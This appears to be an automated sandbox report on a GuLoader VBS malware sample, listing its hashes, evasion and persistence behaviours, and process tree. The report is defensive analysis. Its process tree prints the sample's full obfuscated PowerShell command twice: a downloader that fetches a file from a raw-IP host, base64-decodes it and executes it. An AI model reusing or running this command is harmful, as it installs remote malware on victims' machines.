Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
-
submitted
11/03/2023, 03:36
General
-
Target
Vejlensisk90.vbs
-
Size
34KB
-
MD5
5794e47d892a3cab512697ca7dc223f4
-
SHA1
91f1ac9d1f3209bc5d1bc790319c3675d5a201ed
-
SHA256
ffe477577469c87c606e0cbd9d0da68446cd8d895e4f4ab0a083f0a05ac8ab20
-
SHA512
3699ec735f33e5b9c2c2d5b18ee75e15b736205adf65db8d30df0b56e7c5b0054f73d1eeb6f01e0e85aacbc5ea6cd004bd90c3f8c84b18db5cdf6ee3c2a1d228
-
SSDEEP
768:UObCrpGDPcJLDAxj/gqJ77UgZw3d81bXK4HkMCYFN:J2rpkP2DABveKwNSbXFN
Score
10/10
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious behavior: MapViewOfSection 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 42 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Vejlensisk90.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Foetureta9 ([String]$Eddikeb){For($Modemets=1; $Modemets -lt $Eddikeb.Length-1; $Modemets+=(1+1)){$mdeaftens=$mdeaftens+$Eddikeb.Substring($Modemets, 1)};$mdeaftens;}$cate=Foetureta9 ' hAt t p :U/P/A1B9 4N.B1F8 0 .b4 8R.A2K1H1 / z a rPaN/FDPeHdEeTp sHe uSd 5L2T. t o cH ';$mdeaftens01=Foetureta9 ' iOeTx ';$Sacr = Foetureta9 'T\Es ySsUwHo w 6 4S\PW iSn dSo wBsEP o w e rOSHhReKl lS\ vD1W.B0 \ p o wmeMr srhOe lAlF.me xSe ';.($mdeaftens01) (Foetureta9 'S$ RDa vGkBn o p 2G= $CeOn vS:FwriPnSdRi rT ') ;.($mdeaftens01) (Foetureta9 'C$GS aScRrp=D$ R a vAk nCoapR2A+ $ SpaKcTr ') ;.($mdeaftens01) (Foetureta9 'H$ Y aErDlA D= (A( g wsm iS LwIi nA3 2 _ pBrSoDc ePs s -DF PTrDo c eMsSsRI dG=S$N{AP I D }U) .FC oUm mCa nTdFLLiOnBeS) S- sUpSl i tC [Lc h aDr ]N3 4S ');.($mdeaftens01) (Foetureta9 ' $IF o rPsDbPnS1 3C3M G= A$MYGa r lu[ $ YTaAr lP.Scbo u n tG-C2 ] ');.($mdeaftens01) (Foetureta9 'H$MM o dAe lO= (RTAeHs t - PcaUtWh R$AS aRcNr )K e- A nEdA S( [DIDnbtAP tNr ]H:R: sFi z e - e q R8B) ') ;if ($Model) {.$Sacr $Forsbn133;} else {;$mdeaftens00=Foetureta9 'SS tGaDrSt -UB iOtDsITArBaEnBs f e r G- S oruSrsc eN S$ c a tFeU -DDSe sSt i n aDtRi oRnC Y$PR aWvdkUn o p 2F ';.($mdeaftens01) (Foetureta9 'S$TRKaAvIk nSo pF2L=N$ eRn vs:TaBp ppdOaKtIaJ ') ;.($mdeaftens01) (Foetureta9 'WIUmmpTo r tP-BMGoFdPuBl e UBRiBt s TSr aUnts fSeBrG ') ;$Ravknop2=$Ravknop2+'\Raao.pal';while (-not $Forhandle10) {.($mdeaftens01) (Foetureta9 'M$ F oPrPhba nLd l eI1F0N=D(RTJeOsFt -KP aBtJhh K$ERAa vhk nPo ps2T)H ') ;.($mdeaftens01) $mdeaftens00;.($mdeaftens01) (Foetureta9 ' SMt aSrAt -OS lCe eDpb 5 ');}.($mdeaftens01) (Foetureta9 ' $FFFoSe tUu r eGtMaf N=E AG ertS- CCoAnItGeRnBtR P$ R aMvTk nAo p 2 ');.($mdeaftens01) (Foetureta9 ' $ PJeFlUoSt oJn P= K[UScy s tUePmP. CJoAn vUe r t ]R: : FOr oTmvBFa s eM6 4DS tHr iFnWgL(s$CFJo e tDu r eSt a )R ');.($mdeaftens01) (Foetureta9 'P$ mCdEeTaTf taeRn s 2E =T [ASMyKs t e mK.PTReLx t .VERn c o d i nMgE] :C:uARSJC ILIH.CGDeftTS t r i nHg (N$SPCeSl o tSoEnS) ');.($mdeaftens01) (Foetureta9 'A$TN o nrcso =F$Um dIeBa fRtTeVnAsO2S.BsEu bPsCt rCifnGgS(S1Z8B8 2 6 4 ,T1M9c3B3 5B)F ');.($mdeaftens01) $Nonco;}"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
-
-
C:\Program Files (x86)\internet explorer\ielowutil.exe"C:\Program Files (x86)\internet explorer\ielowutil.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
6.5MB
-
Filesize
136KB
-
Filesize
90.9MB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
6.2MB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
120KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
5.6MB
-
Filesize
80KB
-
Filesize
600KB
-
Filesize
90.9MB
-
Filesize
90.9MB
-
Filesize
90.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB